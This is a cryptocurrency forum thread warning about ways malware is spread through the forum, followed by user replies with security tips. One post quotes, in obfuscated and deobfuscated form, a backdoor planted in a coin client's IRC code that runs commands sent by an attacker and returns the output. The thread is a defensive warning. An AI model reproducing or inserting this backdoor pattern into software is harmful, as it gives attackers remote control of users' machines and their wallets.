Beware of Increasingly Sophisticated Malware Infection Attempts

[bedford1972]

Good post, very cognitive. But I would add here recommendations how to minimize the risks of infection. For example, to create a separate computer for work on the network and separately for wallets. This will help at least keep the funds stored for a long time. I will also recommend using the Tabsbook program, in which you can save frequently used links and go only for them, since attackers often use official resources and make phishing sites. There are a bunch of other recommendations that I advise you to study before you start working with a crypto currency.

[sportcoins]

Thanks for the information. We hate Malware!

[hashcoinusa]

We will never have the insight into the code.   

Dont installed wallet on your main computer. Create a virtual machine and limit your exposure.

[robi5060]

Can anyone please told me about what coin's are effected by sophisticated attacks/ malware.

[Nanoverso]

Some information if these malware infection attempts are affecting other systems beyond Windows, like Mac or Linux?

Checkout my Mario blog (Portuguese): Jogos do Mario Bros.

[Dandidada]

Thank y'all for the enlightenment..it's very much appreciated, knowing fully well there are lots of hacker trying to get easy crypto currency

[prsharma]

Very userful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
thanks for info I will be cautious about content and links before click on it.

[Motookerva]

I am newbie and thanks for informing. I would like to ask how can we spot a scammer?

[Marble777]

Very userful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
thanks for info I will be cautious about content and links before click on it.

it applies also to me because I am a beginner so I do not understand about this forum and sometimes feel paranoid when heard there are many cases of pishing but after reading the above information I really understand da sure that this forum is safe from hackers

[seggardinggins]

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Maybe so but all the tools that are used as much as possible are only used for this purpose in my opinion would be too risky if the tool we use to open the wallet that we use also for other purposes such as games and download mp3 or video because We all know that many malware in most download link

[jaydoes6]

Cant you give anything new? It was prevailing from a very old times in btcs

[gng]

you think faucet sites send malware ?

[AutumnSphinx]

This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.

[Ant112990]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and move my coin out the wallet and created a new wallet.

[bekhuong45]

we need say thanks U.. ) clap clpap

[Magister Magus]

Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed

Your post made me to think in a paranoid way, and I just wondered if we can really trust antimalware softwares: how can we be sure that THEY don't put something malicious, or don't scan for private keys?

It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.

[rammanbl4]

This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.

[redshiftexpensive]

Yes I was totally aware of it

[cp3mc]

I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.

[superresistant]

I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.

You can't detect if an URL is malicious or not.
Either all URL are ban or people are very careful.